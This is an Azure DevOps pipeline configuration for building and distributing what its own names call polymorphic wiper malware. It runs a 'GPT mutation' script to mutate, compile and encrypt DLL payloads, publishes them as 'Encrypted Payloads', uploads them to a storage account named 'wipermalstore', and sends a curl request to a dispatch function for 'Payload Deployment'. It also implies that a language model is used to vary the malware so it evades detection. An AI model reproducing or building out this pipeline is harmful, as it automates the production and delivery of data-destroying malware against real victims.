trigger:
  branches:
    include:
      - main

variables:
  pythonVersion: '3.11'
  buildDir: 'build'
  artifactName: 'payloads'
  storageAccountName: 'wipermalstore'  # must match deployed Azure storage
  functionAppName: 'WiperPolymorphFunc'

stages:
- stage: MutateAndCompile
  displayName: 'Polymorph GPT Mutation + DLL Compilation'
  jobs:
  - job: Build
    pool:
      vmImage: 'ubuntu-latest'
    steps:
    - task: UsePythonVersion@0
      inputs:
        versionSpec: '$(pythonVersion)'
    - script: |
        python -m pip install --upgrade pip
        pip install -r requirements.txt
      displayName: 'Install Dependencies'

    - script: |
        python polymorph_core.py --mutate --compile --encrypt
      displayName: 'Run Polymorphic Mutator'

    - task: PublishBuildArtifacts@1
      inputs:
        PathtoPublish: '$(buildDir)'
        ArtifactName: '$(artifactName)'
        publishLocation: 'Container'
      displayName: 'Publish Encrypted Payloads'

- stage: UploadToBlob
  displayName: 'Upload Payloads to Azure Blob'
  dependsOn: MutateAndCompile
  jobs:
  - job: Upload
    pool:
      vmImage: 'ubuntu-latest'
    steps:
    - task: AzureCLI@2
      inputs:
        azureSubscription: 'Your-Service-Connection-Name'
        scriptType: 'bash'
        scriptLocation: 'inlineScript'
        inlineScript: |
          az storage blob upload-batch \
            --account-name $(storageAccountName) \
            --destination "polymorph" \
            --source "$(Build.ArtifactStagingDirectory)/$(artifactName)" \
            --auth-mode login
      displayName: 'Upload Payloads to Azure Blob'

- stage: TriggerFunction
  displayName: 'Trigger Function to Deploy or Notify'
  dependsOn: UploadToBlob
  jobs:
  - job: Notify
    pool:
      vmImage: 'ubuntu-latest'
    steps:
    - script: |
        curl -X POST "https://$(functionAppName).azurewebsites.net/api/polymorph_dispatch" \
        -H "Content-Type: application/json" \
        -d '{"status": "payload_ready", "blob": "polymorph/encrypted.dll"}'
      displayName: 'Trigger Function App for Payload Deployment'
